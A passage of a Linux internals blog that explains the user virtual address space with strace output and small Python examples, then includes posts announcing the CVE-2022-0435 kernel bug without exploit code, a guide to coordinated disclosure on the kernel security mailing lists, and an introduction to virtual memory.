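# Size of the executable mapping in bytes: end address minus start address.
print(text_mapping.perms, text_mapping.pathname, hex(text_mapping.end - text_mapping.start))
```

On a Linux box you could feed it every line of open("/proc/self/maps") to get the same view for the Python interpreter itself.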

For more information on the different sections of our binary, we can cross-reference the offset information we get from /proc/self/maps with the ELF section headers using objdump -h /usr/bin/cat
ldd lets us print the shared libraries required by a program, we can explore this more by checking out ldd /usr/bin/cat, though for reasons out of scope for this talk, it won’t look identical to our maps output
If we want to get ahead of ourselves, man 2 mmap [4] describes the system call userspace programs use to ask the kernel to map regions of memory
The 2 in man 2 mmap says we want to look at man section 2, for syscalls, and not section 3 for lib functions. man -k mmap lets us search all the sections for references to mmap
Implementing virtual system calls @ LWN
As expected, we can see the vsyscall address is located within the kernel half of the virtual address space, by the leading 0xffff...
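The “leading 0xffff” check is easy to express in code. This is just a sketch, assuming 64-bit addresses on an x86_64 setup like the one in this post, where the top 16 bits are all 0 for userspace and all 1 for the kernel; the function names are my own.

```python
def is_kernel_address(addr: int) -> bool:
    """True if the most significant 16 bits of a 64-bit address are all 1."""
    return (addr >> 48) == 0xFFFF


def is_user_address(addr: int) -> bool:
    """True if the most significant 16 bits of a 64-bit address are all 0."""
    return (addr >> 48) == 0


stack_start = 0x7FFDDC9A0000         # [stack] from the maps output above
vsyscall_start = 0xFFFFFFFFFF600000  # [vsyscall] from the maps output above

print(is_user_address(stack_start), is_kernel_address(vsyscall_start))
```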

The Setup

I’m going to cover the kernel and hardware side of things in coming sections, but I think it’s worth touching on how we go from running cat /proc/self/maps to the memory mapping we saw above.

In the last part we mentioned that system calls act as the fundamental interface between userspace applications and the kernel. If an unprivileged userspace process needs to do a privileged action (e.g. map some memory), it can use the syscall interface to ask the kernel to carry out this action on its behalf [1].

Now that we know what’s being mapped, let’s have a closer look at how, by revisiting strace. strace simply traces the system calls and signals made by a program. As we know memory mapping is handled by the kernel and system calls are how programs get the kernel to do this, strace seems like a good bet!

$ strace cat /proc/self/maps
execve("/usr/bin/cat", ["cat", "/proc/self/maps"], 0x7fff3a014fd8 /* 61 vars */) = 0
brk(NULL)                               = 0x5622ee613000
arch_prctl(0x3001 /* ARCH_??? */, 0x7ffe5d536650) = -1 EINVAL (Invalid argument)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=185283, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 185283, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fa129bcd000
close(3)                                = 0
openat(AT_FDCWD, "/usr/lib/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320\324\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0@\0\0\0\5\0\0\0GNU\0\2\0\0\300\4\0\0\0\3\0\0\0\0\0\0\0"..., 80, 848) = 80
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\205vn\235\204X\261n\234|\346\340|q,\2"..., 68, 928) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=2463384, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa129bcb000
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 2136752, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fa1299c1000
mprotect(0x7fa1299ed000, 1880064, PROT_NONE) = 0
mmap(0x7fa1299ed000, 1531904, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x2c000) = 0x7fa1299ed000
mmap(0x7fa129b63000, 344064, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1a2000) = 0x7fa129b63000
mmap(0x7fa129bb8000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1f6000) = 0x7fa129bb8000
mmap(0x7fa129bbe000, 51888, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fa129bbe000
close(3)                                = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa1299be000
arch_prctl(ARCH_SET_FS, 0x7fa1299be740) = 0
set_tid_address(0x7fa1299bea10)         = 28003
set_robust_list(0x7fa1299bea20, 24)     = 0
rseq(0x7fa1299bf0e0, 0x20, 0, 0x53053053) = 0
mprotect(0x7fa129bb8000, 12288, PROT_READ) = 0
mprotect(0x5622ec6d3000, 4096, PROT_READ) = 0
mprotect(0x7fa129c30000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7fa129bcd000, 185283)          = 0
getrandom("\x62\xf6\x2b\x64\xd3\x81\xee\x98", 8, GRND_NONBLOCK) = 8
brk(NULL)                               = 0x5622ee613000
brk(0x5622ee634000)                     = 0x5622ee634000
openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=3053472, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 3053472, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fa1296d4000
close(3)                                = 0
newfstatat(1, "", {st_mode=S_IFCHR|0600, st_rdev=makedev(0x88, 0x1), ...}, AT_EMPTY_PATH) = 0
openat(AT_FDCWD, "/proc/self/maps", O_RDONLY) = 3
newfstatat(3, "", {st_mode=S_IFREG|0444, st_size=0, ...}, AT_EMPTY_PATH) = 0
fadvise64(3, 0, 0, POSIX_FADV_SEQUENTIAL) = 0
mmap(NULL, 139264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa129bd9000
read(3, "5622ec6c9000-5622ec6cb000 r--p 0"..., 131072) = 2153
write(1, "5622ec6c9000-5622ec6cb000 r--p 0"..., 21535622ec6c9000-5622ec6cb000 r--p 00000000 00:19 868257                     /usr/bin/cat
5622ec6cb000-5622ec6d0000 r-xp 00002000 00:19 868257                     /usr/bin/cat
5622ec6d0000-5622ec6d3000 r--p 00007000 00:19 868257                     /usr/bin/cat
5622ec6d3000-5622ec6d4000 r--p 00009000 00:19 868257                     /usr/bin/cat
5622ec6d4000-5622ec6d5000 rw-p 0000a000 00:19 868257                     /usr/bin/cat
5622ee613000-5622ee634000 rw-p 00000000 00:00 0                          [heap]
7fa1296d4000-7fa1299be000 r--p 00000000 00:19 2289972                    /usr/lib/locale/locale-archive
7fa1299be000-7fa1299c1000 rw-p 00000000 00:00 0 
7fa1299c1000-7fa1299ed000 r--p 00000000 00:19 2289282                    /usr/lib/libc.so.6
7fa1299ed000-7fa129b63000 r-xp 0002c000 00:19 2289282                    /usr/lib/libc.so.6
7fa129b63000-7fa129bb7000 r--p 001a2000 00:19 2289282                    /usr/lib/libc.so.6
7fa129bb7000-7fa129bb8000 ---p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
7fa129bb8000-7fa129bbb000 r--p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
7fa129bbb000-7fa129bbe000 rw-p 001f9000 00:19 2289282                    /usr/lib/libc.so.6
7fa129bbe000-7fa129bcd000 rw-p 00000000 00:00 0 
7fa129bd9000-7fa129bfb000 rw-p 00000000 00:00 0 
7fa129bfb000-7fa129bfd000 r--p 00000000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fa129bfd000-7fa129c24000 r-xp 00002000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fa129c24000-7fa129c2f000 r--p 00029000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fa129c30000-7fa129c32000 r--p 00034000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fa129c32000-7fa129c34000 rw-p 00036000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7ffe5d517000-7ffe5d538000 rw-p 00000000 00:00 0                          [stack]
7ffe5d5c7000-7ffe5d5cb000 r--p 00000000 00:00 0                          [vvar]
7ffe5d5cb000-7ffe5d5cd000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
) = 2153
read(3, "", 131072)                     = 0
munmap(0x7fa129bd9000, 139264)          = 0
close(3)                                = 0
close(1)                                = 0
close(2)                                = 0
exit_group(0)                           = ?
+++ exited with 0 +++

As we mentioned last time, there’s a lot going on here for a program we expect to just be doing the equivalent of read(/proc/self/maps) and write(stdout). In fact, on lines 47 & 48 we can see just that happening. So what’s up with the rest?

I’m thinking it might be out-of-scope for this post to do a line-by-line breakdown (maybe a more specific post about ELFs and processes and stuff?), but let’s highlight some of the main syscalls used for setting up our memory mapping:
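To get a feel for how much of a trace is memory setup, here’s a rough sketch that tallies syscalls by name from saved strace output. The count_syscalls() helper and the regex are my own assumptions about the line format shown above (name, then an opening bracket); the sample lines are copied from the trace.

```python
import re
from collections import Counter

# Assumes each traced call starts at the beginning of a line as "name(".
SYSCALL_RE = re.compile(r"^(\w+)\(")


def count_syscalls(trace: str) -> Counter:
    counts = Counter()
    for line in trace.splitlines():
        match = SYSCALL_RE.match(line)
        if match:  # skips interleaved program output and continuation lines
            counts[match.group(1)] += 1
    return counts


sample_trace = """\
brk(NULL)                               = 0x5622ee613000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa129bcb000
mprotect(0x7fa1299ed000, 1880064, PROT_NONE) = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fa1299be000
close(3)                                = 0
brk(0x5622ee634000)                     = 0x5622ee634000
"""

memory_calls = {"brk", "mmap", "munmap", "mprotect"}
counts = count_syscalls(sample_trace)
print({name: n for name, n in counts.items() if name in memory_calls})
```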

brk()

The brk() syscall is used to adjust the location of the “program break”, which defines the end of the process’s data segment (aka end of the heap).

❓

void *brk(void *addr);

brk(NULL) makes no adjustment, so returns the current program break. We can see this on line 3, which is likely called during initialisation to figure out where the current heap ends, for memory management libs like malloc.

Later on line 37 we can see another call to brk(), asking to extend the program break to 0x5622ee634000. If we take a look at the maps output on line 53, we can in fact see the heap does end at 0x5622ee634000 now! Sweet :)
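As a quick sanity check, we can work out how much the heap grew from the two brk() values in the trace. The 4 KiB page size is an assumption on my part (it’s the usual x86_64 default).

```python
PAGE_SIZE = 4096            # assumed page size (typical x86_64 default)

old_break = 0x5622EE613000  # returned by brk(NULL)
new_break = 0x5622EE634000  # requested by the later brk() call

grown = new_break - old_break
print(hex(grown), grown // 1024, "KiB,", grown // PAGE_SIZE, "pages")
```

That 0x21000 bytes (132 KiB) is exactly the span of the [heap] mapping, 5622ee613000-5622ee634000, in the maps output.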

mmap()

This is the big gun, responsible for the fabled “mappings” we’ve been yapping on about. The mmap() syscall is used to create memory mappings (and munmap() for unmapping them). For more info on args and more, don’t forget to consult man 2 mmap.

❓

void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);

Remember, we can use mmap() to either map a file or device to virtual memory or simply to allocate a blank region of memory to a virtual address:

On line 10 we openat() our libc, identified by file descriptor 3. Then in lines 18-22 we can see we make a series of mmap()’s with the fd arg set to 3; we can then cross-reference the permissions (e.g. PROT_READ|PROT_WRITE) and return addresses with the libc mappings we can see in our maps output on lines 56-61
Conversely we can see some anonymous mappings, where the fd is set to -1 and mmap() is passed the flag MAP_ANONYMOUS, like line 46 [2]
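Both flavours can be tried out from Python’s mmap module, which is a thin wrapper over the same syscall on Unix. This is only a sketch: the flags and prot keyword arguments are Unix-only, and the temporary file is just a stand-in for something like libc.

```python
import mmap
import tempfile

# Anonymous mapping: no backing file, so the fd is -1 and we pass
# MAP_ANONYMOUS, much like the fd=-1 calls in the trace.
anon = mmap.mmap(-1, mmap.PAGESIZE,
                 flags=mmap.MAP_PRIVATE | mmap.MAP_ANONYMOUS,
                 prot=mmap.PROT_READ | mmap.PROT_WRITE)
anon[:5] = b"hello"
anon_bytes = anon[:5]
anon.close()  # unmaps the region, i.e. munmap()

# File-backed mapping: pass a real fd instead; length 0 maps the whole file.
with tempfile.NamedTemporaryFile() as tmp:
    tmp.write(b"mapped from a file\n")
    tmp.flush()
    backed = mmap.mmap(tmp.fileno(), 0, flags=mmap.MAP_PRIVATE, prot=mmap.PROT_READ)
    file_bytes = backed[:6]
    backed.close()

print(anon_bytes, file_bytes)
```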

mprotect()

If mmap() is the big gun, then mprotect() is the syscall used to set the protections for a mapped region of memory (yeah, I couldn’t think of an analogy okay). Typically these protections may be any combination of read, write and execute access flags.

❓

int mprotect(void *addr, size_t len, int prot);

While we can include protection flags via the prot arg for mmap(), mprotect() allows us to set page granular access flags which we can update with each call, without having to map new regions of memory each time.
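The prot values map neatly onto the perms column we saw in maps. Here’s a small sketch of that translation; the helper names are made up, and the numeric values are the Linux ones for PROT_READ, PROT_WRITE and PROT_EXEC.

```python
PROT_NONE, PROT_READ, PROT_WRITE, PROT_EXEC = 0x0, 0x1, 0x2, 0x4


def perms_to_prot(perms: str) -> int:
    """Turn a maps perms string such as 'r-xp' into a prot bitmask."""
    prot = PROT_NONE
    if perms[0] == "r":
        prot |= PROT_READ
    if perms[1] == "w":
        prot |= PROT_WRITE
    if perms[2] == "x":
        prot |= PROT_EXEC
    return prot  # the 4th char (p/s) is private vs shared, not a protection


def prot_to_str(prot: int) -> str:
    """Render a prot bitmask in the style strace prints it."""
    names = [name for bit, name in ((PROT_READ, "PROT_READ"),
                                    (PROT_WRITE, "PROT_WRITE"),
                                    (PROT_EXEC, "PROT_EXEC")) if prot & bit]
    return "|".join(names) or "PROT_NONE"


for perms in ("r--p", "r-xp", "rw-p", "---p"):
    print(perms, "->", prot_to_str(perms_to_prot(perms)))
```

So the mprotect(..., PROT_NONE) call in the trace is what we’d expect to sit behind a ---p entry like the one in the libc mappings.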

execve()

Some of you might have noticed that while we can see regions being mapped for locale-archive and libc, there’s no sign of /usr/bin/cat itself; what happened there? Again, trying to keep within the scope of virtual memory, this setup is handled by the initial execve() system call on line 2.

❓

int execve(const char *pathname, char *const argv[], char *const envp[]);

When a new process is forked (created), execve() then “executes the program referred to by pathname” [3]. This initial call to execve() parses our ELF file /usr/bin/cat and initialises the necessary segments (e.g. text, stack, heap and data).

It’s worth noting that when a process is created, it is done via fork(), which creates a new process by duplicating the calling process. However, execve() will create a new and empty virtual address space for the application at pathname.
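The fork-then-exec dance can be sketched in a few lines using Python’s os wrappers around the same syscalls. The spawn() helper is my own naming, and I’m using the Python interpreter itself as the program to execute purely so the example doesn’t depend on any particular binary being installed.

```python
import os
import sys


def spawn(argv):
    """fork() a child, execve() argv[0] in it, and return its exit code."""
    pid = os.fork()  # child starts as a duplicate of the calling process
    if pid == 0:
        try:
            # Replaces the duplicated address space with a fresh one for argv[0].
            os.execve(argv[0], argv, dict(os.environ))
        finally:
            os._exit(127)  # only reached if execve() itself failed
    _, status = os.waitpid(pid, 0)
    return os.WEXITSTATUS(status) if os.WIFEXITED(status) else -1


exit_code = spawn([sys.executable, "-c", "import sys; sys.exit(7)"])
print(exit_code)
```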

A deep dive on syscalls is out of scope for this talk, but I might touch on it down the line. In the meantime, man pages are your friend, try man syscalls :)
Honestly, without digging some more not 100% sure what these are being used for, though likely for something by the shared libs - exercise for the reader? :P
Surprise, surprise this is from man 2 execve!

Threads

So, we’ve talked a lot about how our usermode processes live in happy isolation within their sandboxed virtual address spaces. Is this always the case? Nope, and one reason is threads.

Threads are essentially light-weight processes and represent a flow of execution within an application. The reason they’re “light-weight processes” is that when threads are created, instead of using fork() they use a similar system call, clone().

clone() is also used to create a process, but allows more control over what resources are shared between the caller and the new child. As a result, in Linux, threads share the same virtual address space and mappings, but each thread gets its own stack (and allocators such as glibc’s malloc may also give threads their own heap arenas).
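We can see the sharing from userspace with a small sketch using Python’s threading module (which, as far as I’m aware, ends up in clone() via pthreads on Linux). Every thread reports the same PID and appends to the very same list object, but each has its own kernel thread ID; the barrier just keeps all the threads alive at once so the IDs can’t be recycled.

```python
import os
import threading

NUM_THREADS = 3
shared = []                               # one object, visible to every thread
barrier = threading.Barrier(NUM_THREADS)  # keep all threads alive together


def worker(tag):
    barrier.wait()
    # list.append is atomic under CPython, so no extra locking is needed here.
    shared.append((tag, os.getpid(), threading.get_native_id()))


threads = [threading.Thread(target=worker, args=(i,)) for i in range(NUM_THREADS)]
for t in threads:
    t.start()
for t in threads:
    t.join()

pids = {pid for _, pid, _ in shared}
tids = {tid for _, _, tid in shared}
print(len(shared), "entries,", len(pids), "pid,", len(tids), "thread ids")
```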

ASLR

Some of you eager enough to run these commands multiple times may have noticed that the addresses for your mappings change each time you run cat, what gives?

Without deviating too off-topic, this is actually normal! It’d be more concerning if nothing changed, as this is the result of a mitigation called ASLR: Address Space Layout Randomisation [1].

ASLR does exactly what it says on the tin, randomising by default the virtual addresses that the stack, heap and shared libraries are mapped to each time the program is run. This helps mitigate exploitation techniques that rely on knowing where stuff is in memory!

Modern compilers are also able to compile code as “position independent” [2], which tl;dr means we can also randomise the virtual address of the executable code as well! Pretty neat :)

Of course, I’d be remiss if I didn’t mention there’s a procfs file to check whether ASLR is currently enabled: cat /proc/sys/kernel/randomize_va_space [3]
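The value in that file is 0, 1 or 2. Here’s a minimal sketch for decoding it; the descriptions paraphrase the kernel’s sysctl documentation and the helper names are hypothetical.

```python
ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base and vDSO randomised",
    2: "as 1, plus the heap (brk) randomised",
}


def describe_aslr(value: str) -> str:
    """Decode the contents of randomize_va_space."""
    return ASLR_MODES.get(int(value.strip()), "unknown")


def read_aslr(path="/proc/sys/kernel/randomize_va_space") -> str:
    # Only meaningful on Linux, where this procfs file exists.
    with open(path) as f:
        return describe_aslr(f.read())


print(describe_aslr("2\n"))
```

On a Linux machine, read_aslr() will tell you what your own system is doing.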

Wrapping Up In UVAS

And there we have it! Hopefully this has provided a high level overview of the user virtual address space. We’ve covered:

That the virtual address space is split up into two sections, the lower half being the unprivileged user virtual address space (UVAS)
Userspace is limited in what it can do, but can ask the kernel to perform privileged actions on its behalf via the system call interface
We looked at what a typical application, cat, uses the UVAS for: loading and mapping the code and data into memory, allocating memory for the heap and stack as well as mapping in library files such as libc and locale information
Next we took a brief look at the system calls that userspace applications can use to get the kernel to set up their virtual address space

Next Time!

Can you believe I planned to wrap everything up in this post? Of course I did, whoops! Suffice to say, we still have a lot to cover in an indeterminate number of posts!

Coming up we’ll context switch and take a closer look at what goes on in the kernel virtual address space and how it’s mapped. After that, we’ll get technical as we figure out how all this is implemented via the kernel and hardware features.

Thanks for reading!

exit(0);

CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel

sam4k — Tue, 15 Feb 2022 23:00:00 +0000

My last post, a guide on disclosing Linux kernel vulns, might have been a bit of a giveaway, but recently I discovered a vulnerability in the Linux kernel that’s been lurking there since 4.8 (July 2016)!

Now that the embargo is up, I can share it with the world! CVE-2022-0435 is a remotely and locally exploitable stack overflow in the TIPC networking module of the Linux kernel (don’t worry, if you haven’t heard of TIPC, it probably isn’t loaded by default on your distro).

Find Out More

If you want a brief technical overview of the vulnerability, check out the advisory I posted to the oss-security mailing list:

oss-sec: CVE-2022-0435: Remote Stack Overflow in Linux Kernel TIPC Module since 4.8 (net/tipc)

For a more detailed analysis of the vulnerability, covering the same content as the advisory, check out my blog post over on the Immunity blog:

CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel

Focusing more on exploitation, I discuss the work and techniques involved in writing a contemporary remote kernel exploit, using CVE-2022-0435 as a case-study:

Writing a Linux Kernel Remote in 2022

Get in Touch!

General reminder that if you have any questions / corrections / suggestions / request for content, regarding CVE-2022-0435 or any of my Linuxy security-y stuff, feel free to @ me on Twitter!

exit(0);

A Dummy's Guide to Disclosing Linux Kernel Vulnerabilities

sam4k — Sat, 05 Feb 2022 19:58:40 +0000

Bit of a niche one today, but my hope is that at least one person will be able to avoid some of the hurdles I had to tackle and the rest will at least get an interesting insight into the process behind responsibly disclosing vulnerabilities in the Linux kernel.

For context, I recently started my new position as a Sr. Security Researcher and during some of my research I discovered a fairly serious looking vulnerability in a part of the Linux kernel - pretty exciting right?! After ~~double~~ ~~triple~~ quadruple checking what I thought I found was, in fact, what I thought I found (and a couple of fist pumps later) - I asked my boss: what do now???

And that brings you all up to speed, as the post below is the culmination of my various Googlings, sifting through docs, advice from community members and maintainers and an array of gotchas encountered, all in the pursuit of answering the question: what do now?!

Some More (Important) Context
Initial Preparation
The Disclosure Process
Wrapping Up

Some More (Important) Context

Before we dive into the process proper, it’s worth highlighting some important context and disclaimers around the nature of this post:

First and foremost, this is advice based on my personal experience and that of the community members I interacted with. One thing worth knowing is that the open-source community is not a hive mind, so opinions will differ![1]
On the topic of personal experience, this is written from the perspective of a zoomer who was born in 1997 and whose prior experience with email was limited to using Gmail for Steam 2FA
Finally, there are different routes for reporting/disclosing based on the nature of the bug. In this case I’m specifically referring to unpatched vulnerabilities within the Linux kernel; where in this instance by vulnerability, I am referring to a “sensitive bug” that could lead to privilege escalations, facilitate PE (KASLR/canary leaks), remote DoS etc.

That being said, I hope the majority of the content of this post has some objective value (otherwise RIP my Saturday morning spent on this)

Initial Preparation

Okay, now that we’ve laid the groundwork and set some context - let’s get stuck into how we’re gonna go about disclosing this crazy kernel vuln we’ve just found! Well, after we make sure we’re ready to disclose this crazy kernel vuln … it is a crazy kernel vuln right?[1]

The more information and understanding you go into the disclosure process with and are able to share, the easier the job is for everyone involved.

Understandably, you don’t want to spend years sat on an 0day to the point you’re able to rewrite the whole subsystem blindfolded, but consider the following:

What is the impact of the vulnerability? Does it lead to privilege escalation? Is it remotely reachable? Is it trivial or difficult to exploit?
What kernel versions are affected? What commit was the vulnerability introduced in?
What part of the kernel is affected? Is it in the core kernel, a networking module?
Is this vulnerability reachable in most configurations, or only in specific environments/use cases? What distributions are affected?
How would you fix the vulnerability? Are there existing mitigations?

If you find yourself in this position and doubting yourself, it’s okay, me too :) In fact it wasn’t until my CVE was assigned that I thought “Huh, it is legit after all”; the best solution is to harness this doubt into thorough testing, research and notes to prove yourself right (or wrong about being wrong?)

The Disclosure Process

It’s time. We’ve put in the work, verified our findings and got a solid understanding of the vulnerability… so, uh, who do we tell? Good question!

coordinated vulnerability disclosure, or “CVD” (formerly known as responsible disclosure)[1] is a vulnerability disclosure model in which a vulnerability or an issue is disclosed to the public only after the responsible parties have been allowed sufficient time to patch or remedy the vulnerability or issue. — Wikipedia

CVD for the Linux kernel is handled, in typical Linux fashion, over mailing lists. There’s a few different mailing lists out there, but in particular we’re interested in the following:

security@kernel.org[1]: private list for Linux kernel security team, who will help verify the bug & facilitate a fix as part of the initial embargoed disclosure
linux-distros@vs.openwall.org: private list of security contacts for various Linux distributions, used as a channel to notify distributions of “non-public medium or high severity security issues” as part of the initial embargoed disclosure
oss-security@lists.openwall.com: public list which anyone can subscribe to, for “public discussion of security flaws, concepts, and practices in the Open Source community” and used for public disclosure of security vulns

It’s worth noting when Googling terms such as “linux vulnerability disclosure” the top kernel doc result is actually for v4.10 and contains less information than the latest versions; can be fixed by adjusting the URL or going here

0x00 An Overview

Before diving into the specifics, below is a quick summary of what the disclosure process will typically look like:

Notify security@kernel.org, linux-distros@vs.openwall.org and relevant maintainers of the vulnerability; establishing details, embargo period, CVE request and possible fix
Discussion ensues and ideally a fix is settled on and the affected parties/distributions are kept in the loop
At the end of the embargo period the patch is committed upstream, oss-security@lists.openwall.com is notified, CVE descriptions are made public, tweets are made etc.
If proof-of-concept code is to be published, this is ideally done several days after to give people time to patch their kernels / apply updates

0x01 First Contact

Alright, finally! We’ve got all the details covered, now we just need to send an email to security@kernel.org and linux-distros@vs.openwall.org right? WRONG!

Well, technically right, but there’s a few crucial details we need to make sure of first, unless you want to stumble your way onto the scene like yours truly.

I’ve linked each of the relevant emails to their respective pages, which outline mailing list usage and any requirements. There’s a lot of information and sometimes it’s conflicting, as “linux kernel vuln” disclosure is only a subset of what these lists are used for.

❗

Going forward I may refer to the lists by shorthand as s@k.o and linux-distros.

So to cut short a long and embarrassing saga of trial and error on my part, here’s a distilled collection of the relevant requirements and advice learned:

Initial disclosure should be sent to linux-distros, CC’ing s@k.o along with any relevant subsystem maintainers[1]
The email should be sent in plaintext; referring here to the email type and not just the fact it’s not encrypted (e.g. as opposed to RTF emails with fancy HTML and stuff)
The subject should be prefixed with [vs] to avoid linux-distros’ spam filter, and the subject shouldn’t contain any sensitive information RE the vulnerability
Propose a tentative public disclosure date & time (e.g. 05/02/22 16:00GMT). Ideally a date should be settled on after a fix is decided, but note the maximum embargo period for linux-distros is 14 days, regardless of whether there is a working fix
Include a request for a CVE to be assigned for the vulnerability
As mentioned, provide as much information and detail as necessary (no War & Peace tho); if you have a fix, see the next section on how to format/include that correctly

With all that in hand, you should be ready to make first contact and begin the coordinated disclosure of your Linux kernel vulnerability, awesome!

I was about to write my own War & Peace on mail clients, but suffice to say the kernel docs provide some helpful information on recommended email clients and any necessary configuration required to get them to play nice.[2]

0x02 Patching & Follow Up

Did I CC the right maintainers?! Did my tabs come through on my patch?? Is this even the right mailing list???? - don’t sweat it, the waiting game can be real.

If you don’t hear back within 48 hours then make sure to follow up the initial email to confirm that it was received, as sometimes things can get lost in the mix.

The discussion that ensues will vary based on the amount of information initially supplied, but will likely focus around impact, mitigations and sorting out a fix.

Including a Patch

“Submitting patches: the essential guide to getting your code into the kernel” is going to be your best friend here, covering almost everything you need to know.

The only difference is you’ll just be including this inline within your disclosure email thread with s@k.o and linux-distros; as opposed to a separate submission.

This is where the whole email client whitespace mangling comes into play, as the Linux kernel uses tabs for indentation and these should really be preserved in patch diffs.

Also, I’m sure it goes without saying, but make sure you test any patches you submit and make this clear when you suggest a patch!

0x03 Public Disclosure

The finishing line is in sight now, you can almost see the retweets, as the embargo period comes to an end. There’s not much to cover here, so I’ll keep it brief:

Hopefully a patch has been finalised and the upstream fix can now be disclosed
You can request linux-distros to make the CVE details public
You should send an advisory out to oss-security@lists.openwall.com; see their wiki for more info, but content will be similar to your initial report to linux-distros[1]
If you plan to publish exploit code, mention this in the initial public advisory, but ideally wait several days for users to update their systems

And that’s it! It’s over! Now you can go back to the easy part and find some more vulns!

Here are some examples of public advisories from Qualys & grsec

Wrapping Up

Hopefully this post has given some insight into a particularly niche subset of coordinated disclosure practice and can provide some help to people who find themselves in a similar position as I did recently!

Admittedly, the process was rather daunting to go into with the self-imposed pressure of wanting to disclose a new vulnerability, complete inexperience with mailing lists and figuring out the relevant processes and requirements which applied to my situation.

That said, it was also extremely rewarding to be able to contribute back to the Linux community and be able to facilitate a fix for something like this. There may have been more than a little bit of fan-boying while interacting with people I’ve followed for a long time, even if they were schooling me on mailing list 101s.

Despite fumbling my way through the process, everyone was helpful and patient, though maybe with this post you can avoid some of the same fumbling.

exit(0);

Linternals: Introducing Virtual Memory

sam4k — Sat, 15 Jan 2022 21:00:00 +0000

Alright, let’s get stuck into some Linternals! As the title suggests, this post will be exploring the ins and outs of virtual memory with regards to modern Linux systems.

I say Linux systems, but this topic, like many in this series, treads the line between examining the Linux kernel and the hardware it runs on, but who cares, it’s still interesting right? And I guess it is one of the fundamental building blocks of modern systems too…

That said, I’ll try to abstract away from getting too stuck into the nitty gritty of hardware specifics where possible (no promises though!), so forgive any gross oversimplifications for what can be a deceptively complex topic.

In this part I’ll lay the groundwork by covering some fundamentals such as the differences between physical and virtual memory, the virtual address space and how user-mode and the kernel interact with this virtual address space.

In a later part (or parts, given my track record), we’ll dive a bit deeper and look into how this is implemented and the ways we can really take advantage of virtual memory.

0x01 What IS Virtual Memory?
- Physical Memory
- Cue Virtual Memory
0x02 The Virtual Address Space
- Let’s Touch on Addressing & Hexadecimal
- That’s a Big VAS
- VAS Overview
  - Advantages of Virtual Memory
0x03 The VM Split
Next Time!

0x01 What IS Virtual Memory?

Virtual memory, every compsci student knows what virtual memory is right, it’s uh, virtual memory, you know, memory that’s not physical? Yeah, I’m realising it can be a bit fiddly to describe virtual memory in a succinct and intuitive way.

Physical Memory

Let’s start with what virtual memory ISN’Tish, and that’s physical! The term “physical memory” typically refers to your system’s RAM (random-access memory). This is the volatile memory your operating system uses for all things transient.

While having your memory cleared when your system is powered-off[1] may seem inconvenient, RAM’s speed makes it ideal for use-cases where volatility doesn’t matter.

Keeping this brief, there’s actually a lot of use-cases for RAM. Like, a lot. The software you’re using to view this post? Loaded into and running in RAM. The operating system running that software? Loaded into and running in RAM.

Often we say how a program is “loaded into memory” and yes, you guessed it, this ubiquitous “memory” and RAM AKA physical memory are all one-and-the-same. We use non-volatile storage such as SSDs and HDDs to store our kernel, binaries, configs and stuff and then when we need to use them, they’re loaded into the much faster RAM for use.

You may also hear RAM referred to as primary memory and SSDs & HDDs as secondary memory.

Unless… here’s a paper from the 2008 USENIX Security Symposium about recovering data from RAM

Cue Virtual Memory

Okay, so now we have a general grasp of physical memory and the integral role it plays, it’s time to introduce the titular virtual memory!

